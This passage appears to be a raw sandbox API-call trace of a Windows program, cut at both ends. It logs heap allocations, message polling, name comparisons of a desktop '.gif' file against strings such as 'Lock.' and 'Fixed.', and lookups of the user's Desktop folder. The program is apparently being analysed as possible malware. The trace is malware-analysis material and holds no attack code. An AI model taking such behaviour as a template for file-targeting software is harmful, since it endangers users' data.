hHeap=0x25c0000) returned 1 [0165.674] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0165.674] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0165.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0165.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0165.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0165.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0165.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0165.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0165.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0165.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0165.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0165.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0165.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0165.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0165.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0165.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gXTZQTDkC2czFZpWnC.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0165.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XTZQTDkC2czFZpWnC.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0165.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TZQTDkC2czFZpWnC.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0165.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZQTDkC2czFZpWnC.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0165.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QTDkC2czFZpWnC.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0165.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TDkC2czFZpWnC.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0165.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DkC2czFZpWnC.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0165.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kC2czFZpWnC.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0165.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C2czFZpWnC.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0165.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2czFZpWnC.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0165.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="czFZpWnC.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0165.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zFZpWnC.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0165.675] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FZpWnC.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0165.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZpWnC.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0165.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pWnC.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0165.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WnC.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0165.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nC.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0165.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0165.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0165.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0165.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0165.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0165.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0165.676] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0165.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0165.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0165.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0165.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0165.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0165.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gXTZQTDkC2czFZpWnC.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0165.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XTZQTDkC2czFZpWnC.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0165.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TZQTDkC2czFZpWnC.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0165.676] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZQTDkC2czFZpWnC.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0165.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QTDkC2czFZpWnC.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0165.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TDkC2czFZpWnC.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0165.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DkC2czFZpWnC.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0165.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kC2czFZpWnC.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0165.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C2czFZpWnC.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0165.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2czFZpWnC.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0165.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="czFZpWnC.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0165.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zFZpWnC.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0165.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FZpWnC.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0165.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZpWnC.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0165.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pWnC.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0165.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WnC.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0165.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nC.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0165.677] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0165.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0165.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0165.677] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0165.677] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0165.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0165.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0165.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ab0 [0165.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0165.678] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0165.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0165.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0165.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0165.678] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0165.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0165.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0165.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b88 [0165.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0165.678] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0165.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0165.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0165.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0165.678] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0165.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0165.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0165.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0165.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0165.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0165.679] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0165.679] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.679] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0165.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0165.679] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0165.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0165.679] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0165.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0165.679] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0165.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0165.679] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/gXTZQTDkC2czFZpWnC.gif", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9846620, ftCreationTime.dwHighDateTime=0x1d4c974, ftLastAccessTime.dwLowDateTime=0xfa86340, ftLastAccessTime.dwHighDateTime=0x1d4d003, ftLastWriteTime.dwLowDateTime=0xfa86340, ftLastWriteTime.dwHighDateTime=0x1d4d003, nFileSizeHigh=0x0, nFileSizeLow=0x5d6d, dwReserved0=0xb330006, dwReserved1=0xe538, cFileName="gXTZQTDkC2czFZpWnC.gif", cAlternateFileName="GXTZQT~1.GIF")) returned 0xaa55e0 [0165.679] FindClose (in: hFindFile=0xaa55e0 | out: hFindFile=0xaa55e0) returned 1 [0165.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0165.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0165.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0165.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0165.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0165.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0165.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0165.680] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0165.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0165.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0165.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0165.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0165.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0165.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0165.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0165.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0165.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0165.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0165.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0165.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0165.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0165.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0165.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0165.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0165.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0165.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0165.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0165.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0165.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0165.681] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0165.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0165.682] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0165.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0165.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0165.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9570 [0165.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0165.682] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0165.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0165.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0165.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0165.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0165.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0165.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0165.682] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0165.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0165.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0165.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0165.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0165.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0165.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0165.683] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0165.683] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0165.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0165.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0165.683] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0165.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0165.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0165.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9af8 [0165.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0165.683] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0165.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0165.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0165.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0165.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0165.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0165.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0165.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0165.684] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0165.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0165.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0165.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0165.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0165.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0165.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0165.684] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0165.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0165.684] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0165.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0165.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0165.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0165.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0165.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0165.685] HeapFree (in: 